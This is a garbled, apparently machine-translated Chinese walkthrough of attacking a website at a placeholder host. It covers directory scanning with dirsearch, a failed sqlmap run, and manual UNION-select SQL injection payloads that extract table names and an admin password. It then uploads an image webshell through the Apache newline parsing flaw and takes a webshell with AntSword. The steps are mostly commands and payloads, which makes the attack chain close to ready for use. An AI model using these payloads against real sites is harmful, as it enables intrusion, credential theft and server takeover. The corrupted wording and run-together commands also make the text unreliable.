1. 关上指标网站
2. 信息收集,应用 dirsearch 对网站进行目录扫描
python dirsearch.py -u xxx.com -e *python dirsearch.py -u xxx.com -e phppython dirsearch.py -u xxx.com -e jsp* 示意扫描 PHP 和 JSPphp 示意扫描 PHPjsp 示意扫描 JSP
3. 剖析扫描后果 200-> 通路403/404 无奈联通
所以咱们查看对象是绿色字体的 200 的返回目录
咱们能够一个一个的尝试,发现存在一个叫 /cms 的目录,进入看看
4. 发现这个才是实在的站点,后面那个只是钓鱼页面
接下来咱们察看一下这个页面,是否存在 交互点
咱们先应用 sqlmap 对指标站点进行 sql 注入 尝试
python sqlmap.py -u xxx.com --dbssqlmap 给出的后果是:
[17:34:47] [WARNING] GET parameter 'id' does not seem to be injectablesqlmap没有发现注入点,咱们尝试 手动注入 ,从 搜寻框 开始
5. 手动注入
' union select 1,2,3 #发现存在 3 个回显点
' union select 1,2,database() #胜利提取到数据库名sqlgunnews
'union select 1,2,table_name from information_schema.tables where table_schema=database() #胜利提取到数据库表名
admin2
class2
news2
system
'union select 1,2,column_name from information_schema.columns where table_name='admin' #胜利提取到 admin 表的字段
' and 1=1 union select 1,admin from admin,3 # ' and 1=1 union select 1,password from admin,3 # 胜利提取管理员账号admin 明码 pass123
6. 寻找后盾
再次应用 dirsearch 扫描/cms 发现后盾地址
输出管理员账号密码进入后盾
7. 发现文件上传性能,上传图片马
设置好代理
通过 burp 抓包后,定位到文件地位
利用apache 换行解析破绽(影响范畴:2.4.0-2.4.29 版本)
Apache 解析破绽次要是因为 Apache 默认一个文件能够有多个用. 宰割的后缀,当最左边的后缀无奈辨认(mime.types 文件中的为非法后缀)则持续向左看,直到碰到非法后缀才进行解析(以最初一个非法后缀为准)
胜利绕过 前后端文件上传检测,上传木马
8. 应用蚁剑连贯,胜利拿到webshell
胜利拿下